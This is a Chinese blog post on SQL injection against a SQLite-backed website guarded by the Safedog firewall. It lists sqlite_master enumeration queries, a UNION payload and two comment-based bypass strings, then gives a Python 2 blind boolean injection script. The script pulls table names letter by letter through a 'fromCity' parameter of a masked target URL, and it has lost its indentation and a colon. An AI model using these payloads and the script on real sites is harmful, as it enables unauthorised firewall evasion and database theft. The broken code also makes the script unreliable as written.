測試了一個網站是Sqlite資料庫,還裝有安全狗,繞過了防護,找到Payload,寫了一個Python腳本來跑表,這裡總結一下:
取得sqlite資料庫裡所有的表名
查詢table,type 段是'table',name段是table的名字,
so: select name from sqlite_master where type='table' order by name;
查詢一條記錄:select name from sqlite_master where type='table' order by name limit 0,1
sqlite_version(*) 傳回SQLite的版本
與MySQL5.x類似的,Sqlite存在與information_schema類似的⼀一個表,預設并不顯示,名為sqlite_master,表中的字段有type,name,tbl_name,rootpage,sql,⽐較有價值的是sql字段
union select 1,sql,2,3 from sqlite_master
繞過安全狗簡單的兩個方法:
/*'+'*/
/**a*/
#! /usr/bin/env python
# _*_ coding:utf-8 _*_
import urllib
import urllib2
payloads = '0123456789@_.abcdefghijklmnopqrstuvwxyz'
header = { 'User-Agent' : 'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)' }
values={}
print 'Start to retrive user:'
user= ''
for i in range(1, 15):
for payload in payloads
values['fromCity']="xxx'/**a*/and/**a*/"+"substr((select name from sqlite_master where type='table' order by name limit 0,1),%s,1)='%s'--" %(i,str(payload))
data = urllib.urlencode(values)
url = "http://www.xxxx.com/xxxx.aspx"
geturl = url+'?'+data
request = urllib2.Request(geturl,headers=header)
response = urllib2.urlopen(request,timeout=5)
result=response.read()
print '.',
if result.count('HO1110')>0:
user += payload
print '\n\n[in progress]', user,
break
print '\n\n[Done] user is %s' % user 參考文章:
PHP/Sqlite下常見漏洞淺析:http://www.2cto.com/Article/201410/342032.html
![【MySQL資料庫】資料庫索引事務1.索引2.事務[圖]](data:image/gif;base64,R0lGODlhAQABAIAAAP///wAAACwAAAAAAQABAAACAkQBADs=)